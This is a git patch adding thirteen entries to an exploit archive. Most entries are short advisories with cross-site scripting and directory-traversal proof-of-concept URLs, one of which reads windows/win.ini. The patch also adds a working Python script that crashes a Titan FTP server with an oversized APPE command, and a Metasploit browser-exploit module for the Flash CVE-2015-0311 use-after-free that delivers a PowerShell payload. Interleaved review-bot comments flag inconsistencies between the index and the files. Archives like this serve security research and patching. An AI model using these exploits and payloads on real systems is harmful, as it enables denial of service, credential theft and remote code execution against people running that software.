From 42107c1e3390f154964e2ffb4f212ace76a604ab Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 14 Mar 2015 08:36:01 +0000 Subject: [PATCH] Update: 2015-03-14 13 new exploits
---
files.csv | 13 ++++ platforms/jsp/webapps/36353.txt | 7 ++ platforms/jsp/webapps/36354.txt | 7 ++ platforms/jsp/webapps/36355.txt | 7 ++ platforms/jsp/webapps/36356.txt | 7 ++ platforms/jsp/webapps/36357.txt | 7 ++ platforms/php/webapps/36362.txt | 13 ++++ platforms/php/webapps/36363.txt | 7 ++ platforms/php/webapps/36364.txt | 11 +++ platforms/php/webapps/36365.txt | 11 +++ platforms/php/webapps/36366.txt | 9 +++ platforms/php/webapps/36367.txt | 9 +++ platforms/windows/dos/36361.py | 87 ++++++++++++++++++++++++ platforms/windows/remote/36360.rb | 107 ++++++++++++++++++++++++++++++ 14 files changed, 302 insertions(+) create mode 100755 platforms/jsp/webapps/36353.txt create mode 100755 platforms/jsp/webapps/36354.txt create mode 100755 platforms/jsp/webapps/36355.txt create mode 100755 platforms/jsp/webapps/36356.txt create mode 100755 platforms/jsp/webapps/36357.txt create mode 100755 platforms/php/webapps/36362.txt create mode 100755 platforms/php/webapps/36363.txt create mode 100755 platforms/php/webapps/36364.txt create mode 100755 platforms/php/webapps/36365.txt create mode 100755 platforms/php/webapps/36366.txt create mode 100755 platforms/php/webapps/36367.txt create mode 100755 platforms/windows/dos/36361.py create mode 100755 platforms/windows/remote/36360.rb
diff --git a/files.csv b/files.csv
index 36e7b5f83..263ab0ef0 100755
--- a/files.csv
+++ b/files.csv
@@ -32771,3 +32771,16 @@ id,file,description,date,author,platform,type,port
 36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 index.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0
 36351,platforms/php/webapps/36351.txt,"alitbang CMS 3.3 alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0
 36352,platforms/linux/remote/36352.txt,"Apache HTTP Server 7.0.x 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2011-11-24,"Prutha Parikh",linux,remote,0
+36353,platforms/jsp/webapps/36353.txt,"HP Network Node Manager i 9.10 nnm/mibdiscover node Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
+36354,platforms/jsp/webapps/36354.txt,"HP Network Node Manager i 9.10 nnm/protected/configurationpoll.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
+36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager i 9.10 nnm/protected/ping.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
+36356,platforms/jsp/webapps/36356.txt,"HP Network Node Manager i 9.10 nnm/protected/statuspoll.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
+36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager i 9.10 nnm/protected/traceroute.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
+36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,metasploit,windows,remote,0
+36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 'APPE' Command Remote Denial Of Service Vulnerability",2011-11-25,"Houssam Sahli",windows,dos,0
+36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0
+36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-28,Amir,php,webapps,0
+36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0
+36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0
+36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0
+36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 /admin/admin_pages.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0
diff --git a/platforms/jsp/webapps/36353.txt b/platforms/jsp/webapps/36353.txt
new file mode 100755
index 000000000..2e43a77b6
--- /dev/null
+++ b/platforms/jsp/webapps/36353.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50806/info
+
+HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/nnm/mibdiscover?node=[xss]
\ No newline at end of file
diff --git a/platforms/jsp/webapps/36354.txt b/platforms/jsp/webapps/36354.txt
new file mode 100755
index 000000000..a23372f21
--- /dev/null
+++ b/platforms/jsp/webapps/36354.txt
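Review bot: Several of the rows added to files.csv disagree with the advisory files added in the same commit, and the index should be reconciled with them before it is used to match affected products or versions. Rows 36355 and 36357 give the paths as `nnm/protected/ping.jsp` and `nnm/protected/traceroute.jsp`, while 36355.txt and 36357.txt show `/protected/...` without the `nnm/` prefix; row 36362 says `eSyndiCat Pro 2.3.5` where 36362.txt says `2.3.05`; row 36365 writes `ajaxfilemanager_OLD` where 36365.txt uses `ajaxfilemanager_old`. Which side is correct cannot be told from this patch, so each pair should be checked against the SecurityFocus entry cited in the corresponding file.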
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50806/info
+
+HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/nnm/protected/configurationpoll.jsp?nodename=[xss]
\ No newline at end of file
diff --git a/platforms/jsp/webapps/36355.txt b/platforms/jsp/webapps/36355.txt
new file mode 100755
index 000000000..d5704535f
--- /dev/null
+++ b/platforms/jsp/webapps/36355.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50806/info
+
+HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/protected/ping.jsp?nodename=[xss]
\ No newline at end of file
diff --git a/platforms/jsp/webapps/36356.txt b/platforms/jsp/webapps/36356.txt
new file mode 100755
index 000000000..3b1649d1e
--- /dev/null
+++ b/platforms/jsp/webapps/36356.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50806/info
+
+HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/nnm/protected/statuspoll.jsp?nodename=[xss]
\ No newline at end of file
diff --git a/platforms/jsp/webapps/36357.txt b/platforms/jsp/webapps/36357.txt
new file mode 100755
index 000000000..63fe8b7e4
--- /dev/null
+++ b/platforms/jsp/webapps/36357.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50806/info
+
+HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/protected/traceroute.jsp?nodename=[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/36362.txt b/platforms/php/webapps/36362.txt
new file mode 100755
index 000000000..1feabdf77
--- /dev/null
+++ b/platforms/php/webapps/36362.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/50822/info
+
+eSyndiCat Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+eSyndiCat Pro 2.3.05 is vulnerable; other versions may also be affected.
+
+http://www.example.com/demo/admin/controller.php?file=admins&do=edit&id=XSS
+http://www.example.com/demo/admin/controller.php?file=blocks&do=edit&id=XSS
+http://www.example.com/demo/admin/controller.php?plugin=articles&do=edit&id=XSS
+http://www.example.com/demo/admin/controller.php?file=suggest-category&id=XSS
+http://www.example.com/demo/admin/controller.php?file=search&_dc=1322239437555&action=get&start=0&limit=10&sort=XSS
\ No newline at end of file
diff --git a/platforms/php/webapps/36363.txt b/platforms/php/webapps/36363.txt
new file mode 100755
index 000000000..da3fbc927
--- /dev/null
+++ b/platforms/php/webapps/36363.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50824/info
+
+Skysa App Bar Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/[path]/wp-content/plugins/skysa-official/skysa.php?submit=[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/36364.txt b/platforms/php/webapps/36364.txt
new file mode 100755
index 000000000..d21c5f8cc
--- /dev/null
+++ b/platforms/php/webapps/36364.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/50839/info
+
+Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks.
+
+Manx 1.0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php?limit=">
+
+http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php?limit=5&search=1&search_folder=Waddup Thricer!
\ No newline at end of file
diff --git a/platforms/php/webapps/36365.txt b/platforms/php/webapps/36365.txt
new file mode 100755
index 000000000..b17ee9afc
--- /dev/null
+++ b/platforms/php/webapps/36365.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/50839/info
+
+Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks.
+
+Manx 1.0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager_old/ajax_get_file_listing.php?limit=">
+
+http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager_old/ajax_get_file_listing.php?limit=5&search=1&search_folder=Waddup Thricer!
\ No newline at end of file
diff --git a/platforms/php/webapps/36366.txt b/platforms/php/webapps/36366.txt
new file mode 100755
index 000000000..0793c5419
--- /dev/null
+++ b/platforms/php/webapps/36366.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50839/info
+
+Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks.
+
+Manx 1.0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/admin_blocks.php?editorChoice=none&fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
\ No newline at end of file
diff --git a/platforms/php/webapps/36367.txt b/platforms/php/webapps/36367.txt
new file mode 100755
index 000000000..8bf62e682
--- /dev/null
+++ b/platforms/php/webapps/36367.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50839/info
+
+Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks.
+
+Manx 1.0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/admin_pages.php?editorChoice=none&fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
\ No newline at end of file
diff --git a/platforms/windows/dos/36361.py b/platforms/windows/dos/36361.py
new file mode 100755
index 000000000..e5a33ac80
--- /dev/null
+++ b/platforms/windows/dos/36361.py
@@ -0,0 +1,87 @@ +source: http://www.securityfocus.com/bid/50819/info + +Titan FTP Server is prone to a remote denial-of-service vulnerability. + +Exploiting this issue allows remote attackers to crash the affected FTP server, denying service to legitimate users. + +Titan FTP Server 8.40 is vulnerable; other versions may also be affected. + +#!/usr/bin/python +# +# Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash +# Date: 25/11/2011 +# Author: Houssam Sahli +# Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe +# Version: 8.40 +# Developed by : South River Technologies, Inc. +# Tested on: Windows XP SP3 French +# Description : This exploit crashs the kernel of a Windows running TITAN FTP Server 8.40 and succeed the magical "blue screen of death". +# Thanks to : Mehdi Boukazoula and Rwissi Networking for their support ;)...because we can improve computer security in Algeria, we'll do it. + +print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft" +print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj" +print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U" +print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f" +print "ULJcJcJLYLL7L7L71 Houssam Sahli 1h1f2f2fFt1fF1Ft" +print "ULJcJcJLYLL7L7L71 backtronux@gmail.com 1h1f2f2fFt1fF1Ft" +print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12" +print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU" +print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft" +print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU" +print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f" +print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft" +print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12" +print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU" +print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i. 
.ri7LfE9 ihh2Ffhfhf2" +print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr., f11PpZQZ.JFF1h2F1hf" +print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2" +print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J" +print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11" +print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf" +print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1" +print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf" +print "tjjtjjJff:.QQQQQQQQ ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12" +print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU" +print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22" +print "FJ1t2t2t22hrt, , ,,, , tPJ7 :QQQQQQQQU:bS2h2hfF2h2" +print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F" +print "1J1t2t1t2t12SYhr ,,,,,,,,,,, .QQF. .tbS2F1F2F1F1hf" +print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21" +print "hUFt1t1f2t2t1fXhFUL: , , , : .jRRSF2h2h1h1SFF2Sf" +print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1" +print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n" + +print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call APPE command.\n" + +import socket +import sys + +def Usage(): + print ("Usage: ./expl.py \n") +buffer= "./A" * 2000 +def start(hostname, username, passwd): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + sock.connect((hostname, 21)) + except: + print ("[-] Connection error!") + sys.exit(1) + r=sock.recv(1024) + print "[+] " + r + sock.send("user %s\r\n" %username) + r=sock.recv(1024) + sock.send("pass %s\r\n" %passwd) + r=sock.recv(1024) + print "[+] wait for the crash...;)" + sock.send("APPE %s\r\n" %buffer) + sock.close() + +if len(sys.argv) <> 4: + Usage() + sys.exit(1) +else: + hostname=sys.argv[1] + username=sys.argv[2] + passwd=sys.argv[3] + start(hostname,username,passwd) + sys.exit(0) 
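Review bot: The only statements of what this script needs and sends are a runtime `print` and the bare `buffer= "./A" * 2000` assignment, so a reader triaging the file has to trace `start()` to learn the precondition and the trigger. A comment above `start()` would carry both, for example `# Needs a login (anonymous included) that is allowed to use APPE; sends one APPE whose argument is "./A" repeated 2000 times.` Read as an inference from the file's own text, that also tells a defender that an account without APPE permission does not reach the affected path through this script, and that the oversized APPE argument is the observable request.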
diff --git a/platforms/windows/remote/36360.rb b/platforms/windows/remote/36360.rb
new file mode 100755
index 000000000..1c825110d
--- /dev/null
+++ b/platforms/windows/remote/36360.rb
@@ -0,0 +1,107 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
+ 'Description' => %q{
+ This module exploits an use after free vulnerability in Adobe Flash Player. The
+ vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
+ to uncompress() a malformed byte stream. This module has been tested successfully
+ on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and
+ 16.0.0.235.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # Vulnerability discovery and exploit in the wild
+ 'hdarwin', # Public exploit by @hdarwin89
+ 'juan vazquez' # msf module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2015-0311'],
+ ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],
+ ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],
+ ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'BrowserRequirements' =>
+ {
+ :source => /script|headers/i,
+ :os_name => OperatingSystems::Match::WINDOWS_7,
+ :ua_name => Msf::HttpClients::IE,
+ :flash => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.287' },
+ :arch => ARCH_X86
+ },
+ 'Targets' =>
+ [
+ [ 'Automatic', {} ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 28 2014',
+ 'DefaultTarget' => 0))
+ end
+
+ def exploit
+ @swf = create_swf
+ super
+ end
+
+ def on_request_exploit(cli, request, target_info)
+ print_status("Request: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status('Sending SWF...')
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+ return
+ end
+
+ print_status('Sending HTML...')
+ send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+ end
+
+ def exploit_template(cli, target_info)
+ swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+ target_payload = get_payload(cli, target_info)
+ psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
+ b64_payload = Rex::Text.encode_base64(psh_payload)
+
+ html_template = %Q|
+
+
+
+
+
+
+
+
+
+
+ |
+
+ return html_template, binding()
+ end
+
+ def create_swf
+ path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
+ swf = ::File.open(path, 'rb') { |f| swf = f.read }
+
+ swf
+ end
+
+end
\ No newline at end of file
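Review bot: `'DisclosureDate' => 'Apr 28 2014'` in `initialize` predates both the `CVE-2015-0311` identifier and the APSA15-01 advisory listed under `'References'`, so it looks carried over from another module and should be replaced with the date of the Adobe advisory. Anything that sorts or filters modules by disclosure date would place this issue roughly a year too early. Separately, `create_swf` assigns `swf` inside its own initialiser, `swf = ::File.open(path, 'rb') { |f| swf = f.read }`; `::File.binread(path)` as the method's only expression reads the same bytes without the redundant assignment.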